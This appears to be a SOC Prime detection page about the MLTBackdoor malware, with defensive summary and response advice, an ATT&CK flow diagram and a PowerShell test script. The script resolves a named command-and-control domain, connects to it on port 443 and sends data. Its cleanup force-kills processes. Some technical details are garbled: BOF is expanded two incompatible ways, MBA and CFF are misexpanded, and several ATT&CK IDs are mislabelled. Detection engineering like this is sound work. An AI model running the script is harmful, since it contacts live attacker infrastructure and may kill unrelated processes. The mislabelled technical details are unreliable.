SOC Prime Bias: High

10 Jun 2026 20:37 UTC
newspaper icon zscaler.com

Technical Analysis of MLTBackdoor

Author Photo
SOC Prime Team linkedin icon Follow
Technical Analysis of MLTBackdoor
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Zscaler ThreatLabz identified a new malware family, MLTBackdoor, in May 2026. The threat is delivered through a multi-stage ClickFix infection chain and appears to be used by ransomware operators to establish initial access and support lateral movement. The malware relies on strong obfuscation, a domain-generation algorithm, and a Beacon Object File (BOF) loader to expand its capabilities after execution. Its network communications are encrypted over TLS and are designed to resemble legitimate Microsoft Delivery Optimization traffic, helping the activity blend into normal network behavior.

Investigation

The analysis followed the infection chain back to a conhost.exe wrapper that downloaded a compressed archive from a domain generated through the malware’s DGA logic. Inside that archive, endpointdlp.dll decrypted an RC4-encrypted payload that was then loaded as the MLTBackdoor binary. Researchers found that the malware uses mixed Boolean arithmetic, control-flow flattening, indirect system calls, and a custom encrypted communication protocol to hinder analysis and detection. The embedded BOF loader also allows the operators to run additional Cobalt Strike-style modules in memory.

Mitigation

Defenders should block the identified command-and-control domains and monitor for the related DGA patterns. Detection should also focus on the specific user-agent string and TLS traffic directed to /api/v1/telemetry over port 443. Security teams should watch for suspicious use of conhost.exe with the documented arguments and for creation of endpointdlp.dll in temporary directories. Behavior-based detections for API hashing and indirect system call usage can further improve visibility into MLTBackdoor activity.

Response

If MLTBackdoor activity is detected, isolate the affected endpoint immediately, terminate the malicious process, and remove any files dropped into the Temp directory by the initial loader. Investigators should then perform a forensic review for additional BOF modules or follow-on payloads. Any potentially exposed credentials should be reset, and threat hunting should be expanded to identify lateral movement attempts using the same tradecraft.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes step_a["<b>Technique</b> – <b>T1189 Drive-by Compromise</b>: Adversary hosts malicious content that is delivered when a victim visits a compromised website.<br/><b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b>: Victim clicks a crafted link that triggers execution of the payload."] class step_a action step_b["<b>Technique</b> – <b>T1659 Content Injection</b>: Malicious code is injected into legitimate web pages so that visitors receive the compromised content."] class step_b action step_c["<b>Technique</b> – <b>T1553.002 Signed Binary Proxy Execution (Defender)</b>: Use of a signed Microsoft Defender binary to proxy execution.<br/><b>Technique</b> – <b>T1574.001 Hijack Execution Flow: DLL Search Order Hijacking</b>: Loads malicious code by manipulating DLL resolution order.<br/><b>Technique</b> – <b>T1218 Signed Binary Proxy Execution</b>: Executes payload through trusted signed binaries."] class step_c action step_d["<b>Technique</b> – <b>T1027.007 Obfuscated/Stored Files: Embedded Payload</b>: Payload is obfuscated using macro binary analysis (MBA) and compressed file format (CFF) to evade detection."] class step_d action step_e["<b>Technique</b> – <b>T1497.001 Virtualization/Sandbox Evasion: System Checks</b>: Checks for virtualized environments.<br/><b>Technique</b> – <b>T1497.003 Virtualization/Sandbox Evasion: Time Checks</b>: Uses timing checks to detect analysis.<br/><b>Technique</b> – <b>T1622 Debugger Evasion</b>: Detects presence of debuggers and alters behavior."] class step_e action step_f["<b>Technique</b> – <b>T1568 Generate, Obfuscate, or Change a Domain Name</b>: Generates numerous domain names for commandu2011andu2011control.<br/><b>Technique</b> – <b>T1104 Web Service (fallback C2)</b>: Uses a web service as a fallback communication channel."] class step_f action step_g["<b>Technique</b> – <b>T1090 Proxy</b>: Routes C2 traffic through a proxy.<br/><b>Technique</b> – <b>T1205 Traffic Signaling</b>: Encodes signaling information within legitimate traffic.<br/><b>Technique</b> – <b>T1001.003 Obfuscated/Encrypted Network Traffic: Protocol Impersonation</b>: Masquerades as normal TLS 443 traffic with a spoofed useru2011agent."] class step_g action step_h["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b>: Transfers a secondu2011stage payload to the compromised host over the network."] class step_h action step_i["<b>Technique</b> – <b>T1546.006 Event Triggered Execution: Component Object Model Hijacking (BOF loader)</b>: Loads and executes Beacon Object Files using a Bufferu2011Overflow (BOF) loader."] class step_i malware %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|leads_to| step_f step_f –>|leads_to| step_g step_g –>|leads_to| step_h step_h –>|leads_to| step_i "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Recon – Resolve DGA domain – The backdoor generates a DNS query for hrs2y15sungu.com, a domain produced by its internal DGA.
    2. C2 Contact – Open a TCP socket – Using PowerShell, the adversary creates a raw TCP connection to the resolved IP on port 443 (HTTPS) to blend with normal traffic.
    3. Payload Retrieval (T1105) – Over the same socket the backdoor would pull additional modules; for the test we simply send a harmless string.

    These steps emit a Sysmon Event ID 3 record with DestinationHostname = hrs2y15sungu.com, satisfying the Sigma rule’s selection condition.

  • Regression Test Script:

    # TC-20260610-A7B3Z – Simulate MLTBackdoor C2 communication
# -------------------------------------------------------
# 1. Resolve the malicious domain (simulated DGA output)
$malDomain = "hrs2y15sungu.com"
try {
    $ip = [System.Net.Dns]::GetHostAddresses($malDomain)[0].IPAddressToString
} catch {
    Write-Error "Failed to resolve $malDomain – aborting test."
    exit 1
}

# 2. Open a TCP connection to the resolved IP on port 443
$port = 443
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($ip, $port)

# 3. Send a harmless payload (simulating module fetch)
$stream = $client.GetStream()
$payload = [System.Text.Encoding]::ASCII.GetBytes("TEST_PAYLOAD")
$stream.Write($payload, 0, $payload.Length)

# 4. Keep connection alive briefly to guarantee log generation
Start-Sleep -Seconds 5

# 5. Clean up
$stream.Close()
$client.Close()
Write-Output "Simulation completed – connection to $malDomain ($ip:$port) closed."

  • Cleanup Commands:

    # Ensure no lingering sockets remain (in case the script aborted)
Get-NetTCPConnection -RemotePort 443 |
    Where-Object { $_.RemoteAddress -eq (Resolve-DnsName hrs2y15sungu.com).IPAddress } |
    ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free